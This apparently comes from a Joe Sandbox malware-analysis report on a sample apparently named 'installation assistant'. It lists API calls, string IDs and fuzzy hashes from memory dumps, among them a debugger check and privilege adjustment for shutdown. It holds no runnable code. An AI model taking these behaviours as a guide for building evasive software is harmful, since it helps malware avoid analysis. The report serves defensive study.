                                                            • Associated: 00000006.00000002.2328885964.000000006CC38000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2330583795.000000006CE02000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 8Q
                                                            • API String ID: 0-4022487301
                                                            • Opcode ID: 0eceabb69cc212cdc16fe4ea4eed4d534fb07063be66ce5869ee3001f537518c
                                                            • Instruction ID: d19d42a7e64ea4ea10c74bfa6d90cc645d72067e7ec5df9d86a0fb5a99a8c9ca
                                                            • Opcode Fuzzy Hash: 0eceabb69cc212cdc16fe4ea4eed4d534fb07063be66ce5869ee3001f537518c
                                                            • Instruction Fuzzy Hash: DBF0A4729016646AD7212A2A8C10BDB36A99F8237CF100717E97597ED0FB7CD44AC6A2
                                                            APIs
                                                            • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6CC15AB4
                                                            • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6CC15AF4
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2327639298.000000006CA91000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA90000, based on PE: true
                                                            • Associated: 00000006.00000002.2327616013.000000006CA90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2328885964.000000006CC38000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2330583795.000000006CE02000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID: Ios_base_dtorstd::ios_base::_
                                                            • String ID:
                                                            • API String ID: 323602529-0
                                                            • Opcode ID: d0f91a5bec0a84a6606ab506b2d7d5ffe4fde745af981a07f628ae543f07f454
                                                            • Instruction ID: cf2d4c2425cfb848768f3526d36d1a1e75280111a324ffb25fa09b598e5e8193
                                                            • Opcode Fuzzy Hash: d0f91a5bec0a84a6606ab506b2d7d5ffe4fde745af981a07f628ae543f07f454
                                                            • Instruction Fuzzy Hash: 5A515871205B00DBD725CF25C884BE6BBF4FB04718F448A1CD4AA4BBA1EB30B549DB80
                                                            APIs
                                                            • GetLastError.KERNEL32(6CC46DD8,0000000C), ref: 6CC1EF52
                                                            • ExitThread.KERNEL32 ref: 6CC1EF59
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2327639298.000000006CA91000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA90000, based on PE: true
                                                            • Associated: 00000006.00000002.2327616013.000000006CA90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2328885964.000000006CC38000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2330583795.000000006CE02000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID: ErrorExitLastThread
                                                            • String ID:
                                                            • API String ID: 1611280651-0
                                                            • Opcode ID: 5b0badcb93e73a61dace68cab1154aee71def0b5dc8af8116a9b70dee45b2769
                                                            • Instruction ID: d13a13fe25a1bedbf9af2af64ab0141635c35fcc31c755a680638a6a6b35ee06
                                                            • Opcode Fuzzy Hash: 5b0badcb93e73a61dace68cab1154aee71def0b5dc8af8116a9b70dee45b2769
                                                            • Instruction Fuzzy Hash: 64F0C271A04604AFDB04EFB1C409AAE3B75FF41218F24828DE405D7F40EF345905EBA1
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2327639298.000000006CA91000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA90000, based on PE: true
                                                            • Associated: 00000006.00000002.2327616013.000000006CA90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2328885964.000000006CC38000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2330583795.000000006CE02000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID: __wsopen_s
                                                            • String ID:
                                                            • API String ID: 3347428461-0
                                                            • Opcode ID: 27ddef4ce02d7c0935d440730775572b51339f8f548df0673324cec1cfcd97d4
                                                            • Instruction ID: fa2255a357daa360492f4899f992abb8ff08bc96e10d9357e83191b4ad05060b
                                                            • Opcode Fuzzy Hash: 27ddef4ce02d7c0935d440730775572b51339f8f548df0673324cec1cfcd97d4
                                                            • Instruction Fuzzy Hash: 4A113671A0420EAFCB05CF59E945A9B7BF8EF49318F1440A9F809EB311E671E911CBA4
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2327639298.000000006CA91000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA90000, based on PE: true
                                                            • Associated: 00000006.00000002.2327616013.000000006CA90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2328885964.000000006CC38000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2330583795.000000006CE02000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID: _free
                                                            • String ID:
                                                            • API String ID: 269201875-0
                                                            • Opcode ID: be7da6dea50fa55462c2689bd82912a63b2abf68e9cf5535eb42c5cf9c623313
                                                            • Instruction ID: 41265b4521f4edea583f211cfb194606e5334cb6ff35c8f39fda2e5f497db67f
                                                            • Opcode Fuzzy Hash: be7da6dea50fa55462c2689bd82912a63b2abf68e9cf5535eb42c5cf9c623313
                                                            • Instruction Fuzzy Hash: FD012C72D05159AFCF01DFA89D009EE7FB5AB08314F144165ED28A26A0E7368A25DB91
                                                            APIs
                                                            • CreateFileW.KERNEL32(00000000,00000000,?,6CC34115,?,?,00000000,?,6CC34115,00000000,0000000C), ref: 6CC34474
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2327639298.000000006CA91000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA90000, based on PE: true
                                                            • Associated: 00000006.00000002.2327616013.000000006CA90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2328885964.000000006CC38000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2330583795.000000006CE02000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID: CreateFile
                                                            • String ID:
                                                            • API String ID: 823142352-0
                                                            • Opcode ID: 83f890d4557e89f7d438f90586bb547a564b5785deb8e600aa84372af08906ae
                                                            • Instruction ID: d7c1b07321be33bc6c6dcb9bf89429c9b38e213dcd39f515ba46e166de85a72f
                                                            • Opcode Fuzzy Hash: 83f890d4557e89f7d438f90586bb547a564b5785deb8e600aa84372af08906ae
                                                            • Instruction Fuzzy Hash: 36D06C3210050DBBDF029E84DC06EDA3BBAFB88714F118000BA5856020C732E861EB90
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2327639298.000000006CA91000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA90000, based on PE: true
                                                            • Associated: 00000006.00000002.2327616013.000000006CA90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2328885964.000000006CC38000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2330583795.000000006CE02000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a80223a001130716628e74e8086c402ab21fb308a8a87af2905342d4276af0b1
                                                            • Instruction ID: b9c03991e20dc7a279cffe99c5752eaf7274f934c92364920a18aeb083d420fb
                                                            • Opcode Fuzzy Hash: a80223a001130716628e74e8086c402ab21fb308a8a87af2905342d4276af0b1
                                                            • Instruction Fuzzy Hash:
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2327639298.000000006CA91000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA90000, based on PE: true
                                                            • Associated: 00000006.00000002.2327616013.000000006CA90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2328885964.000000006CC38000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2330583795.000000006CE02000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID: _strlen
                                                            • String ID: g)''
                                                            • API String ID: 4218353326-3487984327
                                                            • Opcode ID: 3c1a2b91e365f177e463644d25eae4865f819243c71e40439c5385ed76649e58
                                                            • Instruction ID: 06d3297e14d15c6a04a0f8dd4c0d954fa09b8dc74797185f5796412073c3f559
                                                            • Opcode Fuzzy Hash: 3c1a2b91e365f177e463644d25eae4865f819243c71e40439c5385ed76649e58
                                                            • Instruction Fuzzy Hash: 41630271648B018FC728CF2AC8D0A95B7F3BF95318B1D8A6DC0A64BE55E774B44ADB40
                                                            APIs
                                                            • GetCurrentProcess.KERNEL32 ref: 6CC15D6A
                                                            • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 6CC15D76
                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 6CC15D84
                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000000,00000000,00000000), ref: 6CC15DAB
                                                            • NtInitiatePowerAction.NTDLL ref: 6CC15DBF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2327639298.000000006CA91000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA90000, based on PE: true
                                                            • Associated: 00000006.00000002.2327616013.000000006CA90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2328885964.000000006CC38000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2330583795.000000006CE02000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID: ProcessToken$ActionAdjustCurrentInitiateLookupOpenPowerPrivilegePrivilegesValue
                                                            • String ID: SeShutdownPrivilege
                                                            • API String ID: 3256374457-3733053543
                                                            • Opcode ID: b9d670df98ddb67d46a3f896d8b8bbc2c72ace1e87843e22c4a47fd684756ad3
                                                            • Instruction ID: caf9c8b009050b77322ca83409b0ab48c3508986098e1fe45bf93798ed775fb9
                                                            • Opcode Fuzzy Hash: b9d670df98ddb67d46a3f896d8b8bbc2c72ace1e87843e22c4a47fd684756ad3
                                                            • Instruction Fuzzy Hash: B1F0B470644300BBFA00AF24DD0FF9A7BBCEF45709F014618FA85A60C1E7B06885CB92
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2327639298.000000006CA91000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA90000, based on PE: true
                                                            • Associated: 00000006.00000002.2327616013.000000006CA90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2328885964.000000006CC38000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2330583795.000000006CE02000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: \j`7$\j`7$j
                                                            • API String ID: 0-3644614255
                                                            • Opcode ID: f5d27c42e67cb89de11daae8b5c92ef688fda9d9a90421f9c97fed40702992cc
                                                            • Instruction ID: 70f1a704d1ce9c29b434e06da8f9364bb892e5cde3d71f1621a3982b00ca3341
                                                            • Opcode Fuzzy Hash: f5d27c42e67cb89de11daae8b5c92ef688fda9d9a90421f9c97fed40702992cc
                                                            • Instruction Fuzzy Hash: A94246746193828FC724CF68C482A6ABBE5BBC9354F284A1EE5D9C7760D334D885CB53
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 6CCA84B1
                                                              • Part of subcall function 6CCA993B: __EH_prolog.LIBCMT ref: 6CCA9940
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC48000, based on PE: true
                                                            • Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID: 1$`)K$h)K
                                                            • API String ID: 3519838083-3935664338
                                                            • Opcode ID: fb81dbfa73f61bd15ec69b15b7f2714c80bc06e5f8e59c27703e0bd61042d5ed
                                                            • Instruction ID: 60ac84f6d1fc4f89f20e80447ebd96bf6eea9e9ac8cd183b214f1dd3a8efb6c7
                                                            • Opcode Fuzzy Hash: fb81dbfa73f61bd15ec69b15b7f2714c80bc06e5f8e59c27703e0bd61042d5ed
                                                            • Instruction Fuzzy Hash: 57F28D70D01259DFDB11CFA8C888BDDBBB5AF49308F248099E449EB751EB719A86CF11
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 6CC9AEF4
                                                              • Part of subcall function 6CC9E622: __EH_prolog.LIBCMT ref: 6CC9E627
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC48000, based on PE: true
                                                            • Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID: $h%K
                                                            • API String ID: 3519838083-1737110039
                                                            • Opcode ID: 17cf35b80b03fcff345a605a7a63ea6e65b0b9a8420bc989c8341716572d16e6
                                                            • Instruction ID: afb506b1a5d2d3db751b5163375935e3b79e9b426150c42a46735e4cf68cf8b6
                                                            • Opcode Fuzzy Hash: 17cf35b80b03fcff345a605a7a63ea6e65b0b9a8420bc989c8341716572d16e6
                                                            • Instruction Fuzzy Hash: D0536930D01259DFDB25CBA4C994BEDBBB4BF19308F1480D8D449A7A91EB70AE89CF51
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC48000, based on PE: true
                                                            • Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID: $J
                                                            • API String ID: 3519838083-1755042146
                                                            • Opcode ID: bc8a295356575513f6860aba7bf9c3ae3d8e4be31f89be339654daa28ae8d27d
                                                            • Instruction ID: 10946dc677fc92f966416f03d5faaafe75e6771790227007da455a1f1794ac36
                                                            • Opcode Fuzzy Hash: bc8a295356575513f6860aba7bf9c3ae3d8e4be31f89be339654daa28ae8d27d
                                                            • Instruction Fuzzy Hash: B2E2DF7090524ADFEF01CFE8C588BDDBBB0BF05308F248099E855AB691EB75D946CB61
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 6CC76CE5
                                                              • Part of subcall function 6CC4CC2A: __EH_prolog.LIBCMT ref: 6CC4CC2F
                                                              • Part of subcall function 6CC4E6A6: __EH_prolog.LIBCMT ref: 6CC4E6AB
                                                              • Part of subcall function 6CC76A0E: __EH_prolog.LIBCMT ref: 6CC76A13
                                                              • Part of subcall function 6CC76837: __EH_prolog.LIBCMT ref: 6CC7683C
                                                              • Part of subcall function 6CC7A143: __EH_prolog.LIBCMT ref: 6CC7A148
                                                              • Part of subcall function 6CC7A143: ctype.LIBCPMT ref: 6CC7A16C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC48000, based on PE: true
                                                            • Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID: H_prolog$ctype
                                                            • String ID:
                                                            • API String ID: 1039218491-3916222277
                                                            • Opcode ID: 905438d877a3164863332086eaa33768b02ac55e5ee0ef1456ae7a8ba4df0a90
                                                            • Instruction ID: c04909958965afcd1bd2436f5417fc946ce3db42c5e3b1f594533837c19d1e94
                                                            • Opcode Fuzzy Hash: 905438d877a3164863332086eaa33768b02ac55e5ee0ef1456ae7a8ba4df0a90
                                                            • Instruction Fuzzy Hash: 6303CE3080525CDFDF22CFA4C984BDCBBB0EF15318F248099D449A7A91EB349B89DB61
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC48000, based on PE: true
                                                            • Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 3J$`/J$`1J$p0J
                                                            • API String ID: 0-2826663437
                                                            • Opcode ID: 0ce0cf568756059b319bec402cc4c845d2048d3ed56d6c8deb0de92fa915ba20
                                                            • Instruction ID: 3dd74677a80eea89d43fec25693ca37a16363f68719ecaa3e0fbfd8ae1a568c4
                                                            • Opcode Fuzzy Hash: 0ce0cf568756059b319bec402cc4c845d2048d3ed56d6c8deb0de92fa915ba20
                                                            • Instruction Fuzzy Hash: 0341E872F10A601AF3488E7A8C855667FC3C7CE346B4AC23DD565C76D9EABDC40782A4
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC48000, based on PE: true
                                                            • Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID: W
                                                            • API String ID: 3519838083-655174618
                                                            • Opcode ID: ea00faa881669fc0c82860575f49db2074e6a46241474c433f0857494c018303
                                                            • Instruction ID: f11ffa2a3d4cf0d24ec4961d6b901447c7280ec0a8e71fded255a0075bc260bd
                                                            • Opcode Fuzzy Hash: ea00faa881669fc0c82860575f49db2074e6a46241474c433f0857494c018303
                                                            • Instruction Fuzzy Hash: 89B25970A0525ADFDB00CFE8C588B9DBBB4BF09308F244099E846EB751E775E942CB61
                                                            APIs
                                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 6CC20279
                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 6CC20283
                                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 6CC20290
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2327639298.000000006CA91000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA90000, based on PE: true
                                                            • Associated: 00000006.00000002.2327616013.000000006CA90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2328885964.000000006CC38000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2330583795.000000006CE02000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                            • String ID:
                                                            • API String ID: 3906539128-0
                                                            • Opcode ID: 51cd31c36d67f55a6da8468d7f04af268eed855b989dd28742d1f19caf14be1d
                                                            • Instruction ID: 63eea6619a636b45d582962f89cc338f041ee7d21036e4c73a74d019c1db8273
                                                            • Opcode Fuzzy Hash: 51cd31c36d67f55a6da8468d7f04af268eed855b989dd28742d1f19caf14be1d
                                                            • Instruction Fuzzy Hash: 3531C47590121C9BCB21DF69D889BCDBBB8FF08314F6041DAE41DA7650EB749B858F44
                                                            APIs
                                                            • GetCurrentProcess.KERNEL32(00000000,?,6CC1F235,6CC19C49,00000003,00000000,6CC19C49,00000000), ref: 6CC1F19F
                                                            • TerminateProcess.KERNEL32(00000000,?,6CC1F235,6CC19C49,00000003,00000000,6CC19C49,00000000), ref: 6CC1F1A6
                                                            • ExitProcess.KERNEL32 ref: 6CC1F1B8
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2327639298.000000006CA91000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA90000, based on PE: true
                                                            • Associated: 00000006.00000002.2327616013.000000006CA90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2328885964.000000006CC38000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2330583795.000000006CE02000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID: Process$CurrentExitTerminate
                                                            • String ID:
                                                            • API String ID: 1703294689-0
                                                            • Opcode ID: 19f9cc93da089ef28c8f6f626554ffec0f84a5912ad05c6754d5751eed6d931c
                                                            • Instruction ID: 08ef5336cce21c6fdef1a4a7020636ffaec8b50db66e188c0614e7f88f522d40
                                                            • Opcode Fuzzy Hash: 19f9cc93da089ef28c8f6f626554ffec0f84a5912ad05c6754d5751eed6d931c
                                                            • Instruction Fuzzy Hash: D7E0E632505548AFCF017F55C8089493F79FF4526AF358414F419C6A21DB35DD81DB50
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 6CC9489B
                                                              • Part of subcall function 6CC95FC9: __EH_prolog.LIBCMT ref: 6CC95FCE
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC48000, based on PE: true
                                                            • Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID: @ K
                                                            • API String ID: 3519838083-4216449128
                                                            • Opcode ID: 2aafbb27e948f5792f5f0ae65a5e3f4f4742fa89f16e976c1927d8ca4eeab830
                                                            • Instruction ID: 5d166bb229b162ccdb64b2fb6101f9a9031da72d0bdb35a400f6fad88c210296
                                                            • Opcode Fuzzy Hash: 2aafbb27e948f5792f5f0ae65a5e3f4f4742fa89f16e976c1927d8ca4eeab830
                                                            • Instruction Fuzzy Hash: 39D10231E006048FDB14CFA9C890BDEB7B6FF85318F14816AE425ABB84FB749985CB55
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC48000, based on PE: true
                                                            • Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmpDownload File
